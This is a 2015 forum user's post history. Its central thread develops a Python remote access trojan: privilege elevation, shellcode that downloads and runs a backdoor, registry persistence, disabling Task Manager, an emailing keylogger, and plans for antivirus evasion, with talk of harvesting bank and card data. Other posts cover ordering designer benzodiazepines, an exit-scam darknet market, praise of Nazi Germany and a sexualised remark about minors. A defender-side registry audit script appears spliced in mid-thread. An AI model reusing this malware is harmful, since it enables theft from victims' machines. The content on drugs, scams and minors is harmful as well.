Posts by Sophie
-
2015-08-29 at 8:58 PM UTC in fuck space jam
16/m/us, curly black hair and slim figure. Slowly stroking my keys to this thread atm.
kek/lol would kek again. -
2015-08-29 at 8:13 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
My Python knowledge is pretty rudimentary, as I am still working on my programming knowledge and ability, to be honest, but from what I know I don't see why it would be problematic. If I think of anything I will certainly let you know.
Cool, thanks. I suppose one thing I would think would add more pwnage would be a method of separating things like CC info, personal data and account data from the other arbitrary keystrokes logged.
The easiest solution that I can think of for that would probably be writing a program that scans for certain words or URLs in the dump of the keylogger data that we retrieve. Say a victim types in www.bankofamerica.com; it is fair to assume that some personal information is to follow soon after.
There's a fun project, we could probably write a script for that.
Or there's probably a way in which we can grab keystrokes from forms and such, but I imagine that would be pretty involved to pull off. -
2015-08-29 at 7:13 PM UTC in Is Runescape the most complex MMORPG?
WoW was basically kill and gather when you were levelling up, but what was interesting was endgame character building with regards to dungeon and PVP specs/item sets and the like. Heroic dungeons/raids were good as well, but everything became super simple weaksauce after Wrath of the Lich King.
-
2015-08-29 at 6:57 PM UTC in Benadryl is neuroprotective and antidepressive
That's pretty interesting, sploo, good find.
-
2015-08-29 at 6:51 PM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
-
2015-08-29 at 6:50 PM UTC in I have bugs in my ears
I hate bugs.
-
2015-08-29 at 6:44 PM UTC in I want to fucking DIE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You could get a little kitty-cat to play laser with and feed it yum yums. *mew*
Sploo can't even take care of himself, let alone a little kitty-cat. -
2015-08-29 at 6:41 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
-
2015-08-29 at 5:54 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
Ok, so as some of you know I am working on improving gcat and I have come up with what I think is a working model, including relevant code. Now I will give credit where credit is due and will mention that bytebleeder over at GitHub is the one that did all the yeoman's work on this, since he is the author of the actual main module, which includes the implant and the controller. That being said, however, the trojan wasn't really functional in a real-life scenario since it did not offer anything in the way of persistence or self-preservation. So I set out to remedy this, and after a lot of research this is what I came up with. I'll dissect the code as I work through it, as this makes it easier for review.
The malware consists of the following:
- Downloader
- Backdoor
The downloader will be bound to an innocent executable and is designed to download and run the backdoor file.
import os
import sys
import ctypes
import os.path
import _winreg
import win32com.shell.shell as shell

ASADMIN = 'asadmin'

if sys.argv[-1] != ASADMIN:
    script = os.path.abspath(sys.argv[0])
    params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
    shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
    sys.exit(0)
I start off by importing the libs I need for the downloader and proceed to elevate the executable's privilege. I read that by using ShellExecuteEx and then exiting at the end, the program will actually run the next lines of code as administrator without notifying the user. When I was testing it as a script, however, I got a prompt that python.exe was requesting admin privilege (the interpreter, not the script). I have not yet tested it when compiled, but in case it still requests admin privilege I might as well define that with a flag when compiling with PyInstaller anyway; no need to use this 'trick' in that case.
After the program has received admin privilege it's going to check whether we have already downloaded the main module, and if we haven't, it's going to run shellcode that will download and execute the main module.
PATH = 'C:\\Program Files\\Windows Defender\\secureserve.exe'

if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
    break
else:
    # Download file to path and execute (shellcode)
    shellcode = bytearray(
"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
"\x5e\xa4\xb4")
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(shellcode)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
The shellcode provided here is actually an example. The proper shellcode will be generated by me using msfvenom, but only if I can define the path that it's going to be downloaded to instead of the working directory (haven't checked yet). I'll encode it with 'shikata ga nai' encoding to ensure we get no trouble from any anti-virus application. Failing that, I will use the following script to generate custom shellcode.
http://pastebin.com/9GYU1kmL
This script is ready to use, by the way, and will ask you for a URL to the file you wish to download and to define a path where it should be downloaded. It will put out an ASM (assembly) file which you can convert from the terminal using the following command:
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Replace 'PROGRAM' with the name of your ASM file, and it will output your shellcode.
Anyway, after the shellcode has executed the downloader will then add a registry key which will make it so the main module is loaded at boot. Here's the code for that:
# Registry key
PATH_TO_YOUR_EXECUTABLE = PATH
node = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run ', 0, _winreg.KEY_ALL_ACCESS)
_winreg.SetValueEx(node, 'foobar', 0, _winreg.REG_SZ, PATH_TO_YOUR_EXECUTABLE)
After that I want to have the downloader disable the task manager by changing the following registry value:
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
CloseKey(aKey)
If all goes well, by this time the main module will be up and running and will have contacted my C&C. The code for the main module is basically the same as bytebleeder's original; however, I am pickling my keylogger data for data persistence, as shown below.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
class KeyLogger(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.jobid = None
        #self.key_buffer = ''
        try:
            f = open('key.log', 'rb')
            self.key_buffer = pickle.load(f)
            f.close()
        except IOError:
            self.key_buffer = ''
        self.daemon = True

    def run(self):
        #logging.debug("[keylogger] started with jobid: {}".format(self.jobid))
        t1 = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger started'}, self.jobid,))
        t2 = threading.Thread(name='watchKeys', target=self.watchKeys)
        for t in [t1, t2]:
            t.setDaemon(True)
            t.start()
        while True:
            hm = pyHook.HookManager()
            hm.KeyDown = self.onKeyboardEvent
            hm.HookKeyboard()
            pythoncom.PumpMessages()

    def stop(self):
        #logging.debug("[keylogger] stopped with jobid: {}".format(self.jobid))
        t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger stopped'}, self.jobid,))
        t.setDaemon(True)
        t.start()

    def watchKeys(self):
        while True:
            if len(self.key_buffer) >= 100:
                keys = self.key_buffer
                t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': r'{}'.format(keys)}, self.jobid,))
                t.setDaemon(True)
                t.start()
                self.key_buffer = ''
            time.sleep(0.5)

    def onKeyboardEvent(self, event):
        if event.Ascii != 0 or 8:
            self.key_buffer += chr(event.Ascii)
        if event.Ascii == 13:
            self.key_buffer += chr(event.Ascii)
            f = open('key.log', 'wb')
            self.key_buffer = pickle.dump(self.key_buffer, f)
            f.close()
Props to lanny for helping me out with pickling my keylogger data.
I'll be encoding the finished product once more with the Python tool called PeCloak, for AV and sandbox evasion.
http://seclist.us/pecloak-py-beta-a-...sion-tool.html
In any event, I'd like to hear your thoughts on this: how could I improve it even more? Make it better and more stealthy? Also, in the downloader I am checking to see if I already downloaded everything with an 'if' statement. In the else part I am basically running the rest of the program. Is there any problem with this I am not seeing? Also, is there a better solution to get privilege escalation other than what I used here?
Anyway, please let me know what you think. -
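From the defender's side, the two persistence changes the post describes (a value under the CurrentVersion\Run key pointing at an executable dropped into the Windows Defender directory, and DisableTaskMgr set under Policies\System) are both visible in a plain registry export. The following is an added example, not code from the post or from gcat: it parses a constructed .reg-format dump and flags autorun entries that are not on an analyst-maintained allowlist (the allowlist and the sample dump are assumptions made for the example).

```python
import re

# Constructed sample in `reg export` (.reg) format, not taken from the post.
# The "foobar" value and the DisableTaskMgr policy mirror what the downloader writes.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Program Files\\Windows Defender\\MSASCuiL.exe"
"foobar"="C:\\Program Files\\Windows Defender\\secureserve.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
'''

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')


def _reg_string(data):
    """Unquote a .reg string value and collapse its doubled backslashes."""
    return data.strip('"').replace('\\\\', '\\')


def audit_reg_export(text, allowed_autoruns):
    """Return (kind, key, value_name, data) findings for Run/RunOnce values
    outside the allowlist and for a non-zero DisableTaskMgr policy.
    allowed_autoruns: full paths the analyst has verified (assumed input).
    Only REG_SZ and dword values are handled, which is all the post touches."""
    allowed = {p.lower() for p in allowed_autoruns}
    findings = []
    key = None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group('key')      # new [HKEY_...] section starts
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, data = m.group('name'), m.group('data')
        lowered = key.lower()
        if lowered.endswith(('\\currentversion\\run', '\\currentversion\\runonce')):
            path = _reg_string(data)
            if path.lower() not in allowed:
                findings.append(('unexpected_autorun', key, name, path))
        elif lowered.endswith('\\policies\\system') and name.lower() == 'disabletaskmgr':
            if data.lower().startswith('dword:') and int(data[6:], 16) != 0:
                findings.append(('taskmgr_disabled', key, name, int(data[6:], 16)))
    return findings
```

Run it against `reg export` output of the two keys on a host under review; an autorun named after a security product but not on the allowlist, combined with a Task Manager lockout, is the pattern the post's downloader leaves behind.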
2015-08-29 at 11:26 AM UTC in So the weirdos over at /phile/ seem to think this game Splatoon is the shit...
The only 2 people who seem to post on that board are both severely autistic, so this isn't surprising.
Word, I never got the appeal of animu lolis over actual lolis anyway, which /phile/ seems to be all over. -
2015-08-29 at 11:21 AM UTC in How many people with an interest in cyber security("Hacking") are still here?
With all these computer folks around here, you would think that we would form an alliance and start a darknet marketplace. Maybe one selling stolen goods and car parts, as re: my suggestion.
Yeah, no. Sit back, shut up, and learn from those who know, both of us, or take your middle-aged teenaged Midwest mindset back to Bad Ideas, where you and the rest of the would-be criminal masterminds master bate each other's bait.
Eh, truth be told, it's not the worst idea. If you hold the bitcoin in escrow and run off with them before your market becomes too notorious you could stand to make a pretty profit. The trick would be securing your hidden service while you gather a small following and consequently the bitcoins. -
2015-08-29 at 11:05 AM UTC in How many people with an interest in cyber security("Hacking") are still here?
https://evilzone.org/
As if I don't already have an account there. Lulz. They're very knowledgeable and good shit in general; I like the people here better, though. -
2015-08-29 at 12:53 AM UTC in Teach me Perl niggas
That's where I started off. This one helped quite a bit as well:
http://qntm.org/files/perl/perl.html
Cool, anything specific you're looking to write? -
2015-08-28 at 11:04 PM UTC in Teach me Perl niggas
I have no experience with Perl myself, but the official site seems informative enough.
http://learn.perl.org/
https://www.perl.org/books/beginning-perl/ -
2015-08-28 at 8:31 PM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
Is clonazolam recreational and/or worth ordering? Better than etiz? Better than flubromazolam, or worse?
I love k-pins personally. They last longer than etiz and are more fun in my experience. -
2015-08-28 at 8:26 PM UTC in How many people with an interest in cyber security("Hacking") are still here?
I would, but I get instant shame because people 4 years younger than me are better at programming/hacking due to public school, one of the best cyber security/computer science academies in the state/country, and I got kicked out for never going to school.
Never too late to learn, though; I only really got into IT when I was older. There are loads of people better than me, that's just the way it is. -
2015-08-28 at 8:09 PM UTC in Why minimum wage is bad.
I didn't say anything bad about the Third Reich. I pointed out that they lost and because of that Italy got fucked. Italy was weaksauce during WWII BECAUSE Germany didn't have the resources to fight their own war plus Italy's. If we wanna talk about Germany in WWII, they were some strong motherfuckers. I mean the German people held the entire world at bay FOR SIX DAMN YEARS in what amounted to them vs nearly every world superpower. Talk about ballers, son!
Also, if Mussolini sent his troops to Russia they would have died anyway. Everybody knows it's a fool's errand to invade Russia. Napoleon couldn't do it, Hitler couldn't do it; it's just not feasible to attempt. If Hitler had actually listened to his advisors and waited to invade Russia, the outcome of that war would have been drastically changed. It was foolish to send that many troops and expend that many resources because all it did was kill troops and deplete resources, resulting in less ability to fight the fronts that mattered.
Of course invading Russia was stupid. But in the days of Italy's invasion Germany had sent lots of troops there as well, which would have been put to good use elsewhere as well, so yeah, I'm a bit shitposting anyway. But Nazi Germany was pretty cool, mmk? -
2015-08-28 at 7:58 PM UTC in ATTN: Sophie
Nah, not really. I'm straight, and if I was gay, I'd still probably think you're ugly and want nothing to do with you. Post a pic and let's see "how gay I am" for you. But you won't, because you're a big pussssaay.
Dang, Bill Krozby, have you been drinking? You're being awfully salty tonight. Relax, you can be my BFF too if you want. <3 -
2015-08-28 at 7:18 PM UTC in ATTN: Sophie
lol thelittlestnigga is kinda gay
You're just jelly.
-
2015-08-28 at 6:56 PM UTC in How many people with an interest in cyber security("Hacking") are still here?
I am hella interested in learning more, but I probably won't be able to contribute too much till I get a good base on my shit. I still have a lot more programming/TCP/IP/NETSEC stuff to learn before I can really help out.
plz2BteachingmeNetSec!?!?!?!
Netsec as in actual network security, or more loosely the reddit definition (which is more infosec anyway)? Or with a focus on web app penetration testing, website hacking and stuff like that? I'll tell you straight up front, I have a working knowledge of networking and protocols, but networking per se is not my strong suit. With regards to web apps, I know the basics of SQLi and XSS and understand the principles behind remote file inclusion and local file inclusion, and I could certainly point you in the direction of the various tools that can be used for these purposes and how to operate them semi-proficiently. Think Kali Linux, PentestBox and the like. Beyond that, I could probably teach you some Metasploit, how to work several vulnerability scanners and how to use Google dorks and some basic manual tests to see if a site is vulnerable to SQL injection and stuff like that.
Like I said, tell me what you're looking for specifically and I'll try to provide you with the content you require. If I don't know something, and there's always a high chance of that, I will certainly know some resources that will be helpful in increasing both our understanding of the subject matter at hand. Indeed, collaborative learning is what would make this extra fun and interesting.